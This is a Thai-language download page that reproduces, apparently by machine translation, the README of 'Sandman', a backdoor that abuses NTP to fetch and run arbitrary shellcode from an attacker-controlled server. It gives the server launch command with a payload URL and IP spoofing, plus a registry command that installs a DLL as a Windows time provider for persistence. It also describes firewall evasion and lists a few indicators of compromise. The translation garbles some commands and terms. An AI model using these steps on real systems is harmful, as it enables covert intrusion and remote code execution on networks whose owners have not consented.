หน้าแรก>การเขียนโปรแกรมที่เกี่ยวข้อง>ซอร์สโค้ดอื่น ๆ
ดาวน์โหลด

คนทราย

แซนด์แมนเป็นแบ็คดอร์ที่ตั้งใจจะทำงานบนเครือข่ายที่แข็งกระด้างในระหว่างการนัดหมายทีมสีแดง

Sandman ทำงานเป็น stager และใช้ประโยชน์จาก NTP (โปรโตคอลในการซิงค์เวลาและวันที่) เพื่อรับและเรียกใช้ Shellcode โดยพลการจากเซิร์ฟเวอร์ที่กำหนดไว้ล่วงหน้า

เนื่องจาก NTP เป็นโปรโตคอลที่ถูกมองข้ามโดยผู้พิทักษ์หลายคนจึงทำให้การเข้าถึงเครือข่ายกว้าง

การใช้งาน

คนทราย

SandManserver (การใช้งาน)

รันบน Windows / *Nix Machine: 

python3 sandman_server.py " Network Adapter " " Payload Url " " optional: ip to spoof "

  • อะแดปเตอร์เครือข่าย: อะแดปเตอร์ที่คุณต้องการให้เซิร์ฟเวอร์ฟัง (เช่นอีเธอร์เน็ตสำหรับ Windows, eth0 สำหรับ *nix)

  • Payload URL: URL ไปยัง ShellCode ของคุณอาจเป็นเอเจนต์ของคุณ (ตัวอย่างเช่น CobaltStrike หรือ Meterpreter) หรือ Stager อื่น

  • IP to spoof: หากคุณต้องการปลอมแปลงที่อยู่ IP ที่ถูกกฎหมาย (ตัวอย่างเช่นที่อยู่ IP ของ Time.microsoft.com)

Sandmanbackdoor (การใช้งาน)

ในการเริ่มต้นคุณสามารถรวบรวม SandManbackdoor ดังที่ได้กล่าวไว้ด้านล่างเนื่องจากเป็น C# ที่มีน้ำหนักเบาเพียงครั้งเดียวคุณสามารถดำเนินการผ่าน ExecuteAsSembly เรียกใช้เป็นผู้ให้บริการ NTP หรือเพียงแค่ดำเนินการ/ฉีด

SandmanbackDoortimeProvider (การใช้งาน)

ในการใช้งานคุณจะต้องทำตามขั้นตอนง่ายๆ:

  • เพิ่มค่ารีจิสทรีต่อไปนี้: 
 reg add " HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient " /v DllName /t REG_SZ /d " C:PathToTheDll.dll "
  • รีสตาร์ทบริการ W32Time: 
 sc stop w32time
sc start w32time

หมายเหตุ: ตรวจสอบให้แน่ใจว่าคุณกำลังรวบรวมตัวเลือก x64 และไม่ใช่ตัวเลือก CPU ใด ๆ !

ความสามารถ

  • รับและดำเนินการเพย์โหลดโดยพลการจากเซิร์ฟเวอร์ควบคุมของผู้โจมตี

  • สามารถทำงานกับเครือข่ายที่แข็งตัวได้เนื่องจาก NTP มักจะได้รับอนุญาตใน FW

  • การแอบอ้างเป็นเซิร์ฟเวอร์ NTP ที่ถูกกฎหมายผ่านการปลอมแปลง IP

การตั้งค่า

SandManserver (การตั้งค่า)

  • Python 3.9

  • ข้อกำหนดที่ระบุไว้ในไฟล์ข้อกำหนด

Sandmanbackdoor (การตั้งค่า)

ในการรวบรวมแบ็คดอร์ที่ฉันใช้ Visual Studio 2022 แต่ดังที่ได้กล่าวไว้ในส่วนการใช้งานสามารถรวบรวมได้ด้วยทั้ง VS2022 และ CSC คุณสามารถรวบรวมได้โดยใช้ use_shellcode และใช้ ShellCode ของ Orca หรือไม่มี use_shellcode เพื่อใช้ webclient

SandmanbackDoortimeProvider (การตั้งค่า)

ในการรวบรวมแบ็คดอร์ที่ฉันใช้ Visual Studio 2022 คุณจะต้องติดตั้ง dllexport (ผ่าน Nuget หรือวิธีอื่น ๆ ) เพื่อรวบรวม คุณสามารถรวบรวมได้โดยใช้ use_shellcode และใช้ ShellCode ของ Orca หรือไม่มี use_shellcode เพื่อใช้ webclient

IOCs

  • เชลล์ถูกฉีดเข้าไปใน RuntimeBroker

  • การสื่อสาร NTP ที่น่าสงสัยเริ่มต้นด้วยส่วนหัวเวทมนตร์ที่รู้จัก

  • กฎของ Yara

มีส่วนร่วม

  • orca สำหรับ shellcode

  • ขอขอบคุณเป็นพิเศษสำหรับ Tim McGuffin สำหรับแนวคิดผู้ให้บริการเวลา

ขอบคุณผู้ที่มีส่วนร่วมแล้วและฉันจะยอมรับการมีส่วนร่วมอย่างมีความสุขทำการขอดึงและฉันจะตรวจสอบ!

ขยาย
ข้อมูลเพิ่มเติม
แอปที่เกี่ยวข้อง
แนะนำสำหรับคุณ
ข้อมูลที่เกี่ยวข้อง ทั้งหมด